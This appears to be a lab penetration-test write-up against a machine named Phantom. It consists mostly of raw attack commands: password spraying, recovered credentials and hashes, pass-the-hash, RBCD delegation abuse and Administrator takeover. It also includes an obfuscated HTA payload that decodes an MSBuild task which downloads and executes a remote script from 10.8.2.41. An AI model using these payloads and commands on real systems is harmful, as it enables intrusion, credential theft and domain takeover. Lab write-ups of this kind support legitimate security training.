Penetration Testing Report - Phantom

Executive Summary

This comprehensive report documents a simulated penetration test aimed at assessing the security posture of a corporate network with the ultimate goal of compromising the a domain controller. The test was designed to emulate a sophisticated adversarial attack that strategically uses multiple cycles of lateral movement and privilege escalation. The test utilized a variety of attack techniques that align with the MITRE ATT&CK framework, each carefully chosen to exploit specific vulnerabilities within the network.

Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.

Detailed Findings

The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP address.

ID	IPs	Domain	DC
Machine_1	10.10.112.244	phantom.vl	dc.sendai.vl

Enumeration: Phase

• Guest Login on Smb client

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph4nt0m@5t4rt!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phantom Team

• RID brute force

cme smb 10.10.112.244 -u 'users2.txt' -p 'Ph4nt0m@5t4rt!' --continue-on-success

 phantom.vl\ibryant:Ph4nt0m@5t4rt!

smbclient.py 'ibryant:Ph4nt0m@5t4rt!@10.10.112.244'

• Three Departments

• Finance

• HR

• IT

 host-name "vyos"
    login {
        user admin {
            authentication {
                encrypted-password "$6$rounds=656000$6diBtlKOC2mmpMcP$G.DyFWB.fDoVSEfQN197v8lkGZbj6AI91P39eiNYoF8ymQoK11F.mLuQ6ulUFAxPkYMxVOq.WnkBwzmEWu81H."
            }
        }
        user vyos {
            authentication {
                encrypted-password "$6$rounds=656000$Etl2frgw6IuOffzT$LPX5DjrOKSiVnTjPSLMnVevH4Y4eMf7SEWL6V8eH8GNUSDbFZX7Hj/jFvEGspjAtRY1lLohfGfOiraR1UGiDh."
                plaintext-password ""
            }
        }
    }

        authentication {
            local-users {
                username lstanley {
                    password "gB6XTcqVP5MlP7Rc"
                }

SMB         10.10.112.244   445    DC               [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc

SLiver 64.hta

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjguMi40MS9hbXNpNjQudHh0JykgfCBpZXgiOwogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOwogICAgICAgICAgICBycy5PcGVuKCk7CiAgICAgICAgICAgIFBvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOwogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOwogICAgICAgICAgICBwcy5BZGRTY3JpcHQoY21kKTsKICAgICAgICAgICAgcHMuSW52b2tlKCk7CiAgICAgICAgICAgIHJzLkNsb3NlKCk7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwoKCiAgICAgICAgICAgICAgICB9CgoKICAgICAgICAgICAgfQoKCgoKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogIDwvVXNpbmdUYXNrPgo8L1Byb2plY3Q+Cg== > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

evil-winrm -i phantom.vl -u svc_sspr -p gB6XTcqVP5MlP7Rc

pth-net rpc password "rnichols" "newP@ssword2022" -U 'phantom.vl/svc_sspr%8ecffccc2f22c1607b8e104296ffbf68:8ecffccc2f22c1607b8e104296ffbf68' -S 10.10.83.222

 rbcd.py -delegate-from 'rnichols' -delegate-to 'DC$' -dc-ip '10.10.83.222' -action 'write' 'phantom.vl'/'rnichols':'newP@ssword2022'

Follow RBCD spn less user in kerberos

 Administrator:500:aad3b435b51404eeaad3b435b51404ee:71fde26ba67afaedbed8b3549012d930:::

evil-winrm -i phantom.vl -u Administrator -H 71fde26ba67afaedbed8b3549012d930